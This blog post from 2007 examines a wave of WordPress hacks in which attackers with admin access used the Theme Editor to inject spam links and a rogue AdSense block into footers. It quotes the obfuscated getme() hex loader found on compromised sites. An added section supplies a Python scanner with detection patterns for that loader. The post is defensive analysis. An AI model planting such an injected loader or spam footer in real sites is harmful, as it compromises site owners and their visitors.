Tips, Tricks, Tools & Techniques

for Internet Business, Life, the Universe and Everything


More On WordPress Security Issues (a.k.a. The Al Gore Hack)

28 November, 2007 (12:05) | Security, WordPress | By: Nick Dalton

The Symantec Security Response Weblog has a good writeup about the hack and the elaborate network scheme behind it. Their conclusions mostly match those in my post yesterday.

I still haven’t been able to track down the exact exploit used to compromise all these WordPress blogs. All the compromised blogs that I’ve examined run older versions of WordPress (<= 2.0.6). There are several older vulnerabilities that allow an attacker to assume admin privileges.
With admin privileges the attacker can use the Theme Editor to add their spam links to the footer template. Using the Theme Editor gets around the problem of knowing which file to edit since each theme is installed in a separate directory. If the attacker only had access to the file system (e.g. via ftp), then there is no easy way to know which is the active WordPress theme.

On a most likely unrelated note, GigaOM has a post about security issues in WordPress Themes. It turns out that some bad guys are taking free WordPress themes and modifying them slightly so that they can run arbitrary code on each web server running that WordPress theme. This is a huge security risk!

Follow the basic security rule: Don’t download files from untrusted sources. Just because someone is advertising their free WordPress template site on AdWords doesn’t mean that the site is legitimate.

The reason I say that the two security issues are unrelated is because the compromised blogs do not share a common WordPress theme.
If anyone who has been compromised would be willing to share their web access logs, I would be very interested in examining them.

When looking at the HTML source of web pages that have been compromised I noticed that not only did the attacker add their spam links, they also added an AdSense block. First I thought that each blog just happened to have their AdSense JavaScript in the same position at the bottom of the page. But when I saw the AdSense code on I figured that something was wrong. Why would have AdSense on their site?

After closer examination I realized that all compromised sites had the exact same AdSense code:
getme(' 636D6071685F676C255D5A68385E565D545C612E64334D100E4D5 45652090A0E5252564840083D414A4641354C0FF83E3E3C32F306');
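As an added example (not code from the original post), here is a small Python scanner a site owner could run over wp-content/themes to flag the two indicators described above: a hidden block wrapping a spam link, and the getme('<hex>') loader. It walks every installed theme, so the defender does not need to know which theme is active; the regexes, the spam.example URL and the two sample footers are constructed for this example, with the hex string taken from the code quoted above.

```python
import re
import tempfile
from pathlib import Path

# The loader seen on every compromised blog: getme() with a long hex argument;
# whitespace inside the blob is tolerated because templates wrap long lines.
GETME_RE = re.compile(r"getme\(\s*'([0-9A-Fa-f\s]{40,})'\s*\)")
# Spam links parked in a hidden container, the usual footer-template trick.
HIDDEN_RE = re.compile(r"display\s*:\s*none[^>]*>\s*<a\s", re.IGNORECASE)

def scan_file(path):
    """Return (line_no, reason) findings for one template file."""
    text = Path(path).read_text(errors="replace")
    findings = []
    for regex, reason in ((GETME_RE, "getme() call with hex payload"),
                          (HIDDEN_RE, "hidden element wrapping a link")):
        for m in regex.finditer(text):
            findings.append((text.count("\n", 0, m.start()) + 1, reason))
    return findings

def scan_themes(themes_dir):
    """Scan every installed theme, not just the active one; return a map of
    relative file path -> findings for files that contain an indicator."""
    root = Path(themes_dir)
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_file(path)
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample: one untouched theme and one whose footer.php carries an
# injected hidden link plus the getme() block quoted in the post.
CLEAN_FOOTER = '<div id="footer">\n<p>Powered by WordPress</p>\n</div>\n'
HACKED_FOOTER = (
    '<div id="footer">\n'
    '<p>Powered by WordPress</p>\n'
    '<div style="display:none"><a href="http://spam.example/">cheap pills</a></div>\n'
    "<script type=\"text/javascript\">getme('636D6071685F676C255D5A68385E565D545C612E64334D100E4D5 "
    "45652090A0E5252564840083D414A4641354C0FF83E3E3C32F306');</script>\n"
    '</div>\n'
)

def build_sample_themes():
    """Write the two sample themes to a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="wp-themes-"))
    for name, footer in (("clean", CLEAN_FOOTER), ("hacked", HACKED_FOOTER)):
        (root / name).mkdir()
        (root / name / "footer.php").write_text(footer)
    return root
```

Running scan_themes(build_sample_themes()) reports only hacked/footer.php, with the getme() call on line 4 and the hidden link on line 3; point it at a real wp-content/themes directory to check a live install.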

Someone at Google should be able to find out who is benefiting financially from that AdSense code. Money always leaves a trail.
